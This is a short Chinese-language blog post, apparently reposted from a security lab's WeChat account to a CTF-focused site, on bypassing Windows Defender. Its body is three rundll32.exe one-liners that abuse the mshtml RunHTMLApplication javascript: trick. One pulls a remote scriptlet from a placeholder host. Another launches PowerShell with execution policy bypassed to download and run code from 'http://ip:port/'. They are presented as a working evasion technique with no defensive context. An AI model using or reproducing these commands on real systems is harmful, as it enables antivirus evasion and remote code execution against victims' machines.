CTF导航 CTF导航

绕过 Windows Defender

渗透技巧 3年前 (2022) admin
485 0 0


绕过 Windows Defender


绕过 Windows Defender 木马:Win32/Powessere.G 


C: > rundll32.exe javascript:" ...... mshtml,RunHTMLApplication ";alert (666) 

C: > rundll32.exe javascript:" ...... mshtml,RunHTMLApplication ";document.write () ;GetObject ("script"+":"+"http :// xxxx/hi.tmp")

rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("http://WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"

原文始发于微信公众号(Khan安全攻防实验室):绕过 Windows Defender

版权声明:admin 发表于 2022年1月18日 上午1:04。
转载请注明:绕过 Windows Defender | CTF导航

相关文章

CVE-2021-40444 Office漏洞复现CS上线
admin
1,561
Java Zip Slip漏洞案例分析及实战挖掘
admin
496
【技术原创】域渗透——利用GPO中的脚本实现远程执行
admin
376
Cobaltstrike狩猎与对抗
admin
719
Joern In RealWorld (1) – Acutators + CVE-2022-21724
admin
228
SQL Injection in netease-youdao/qanything
admin
31

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

Boolean-based SQL Injection in ZoneMinder v1.37.* <= 1.37.64
0
Open-Source Intelligence Summit 2024议题慢递
0
NTLM Relaying – Making the Old New Again
0
每日安全动态推送(24/11/4)
0
wuzhicms<=4.1.0后台RCE(0day)
0
每周蓝军技术推送(2024.10.26-11.1)
0
Apache Solr漏洞CVE-2024-45216分析
0
某小型cms漏洞复现审计
0
Distributed RPC Framework RemoteModule has Deserialization RCE in pytorch/pytorch(CVE-2024-48063)
0
JWT(JSON Web Token) 攻击面小结
0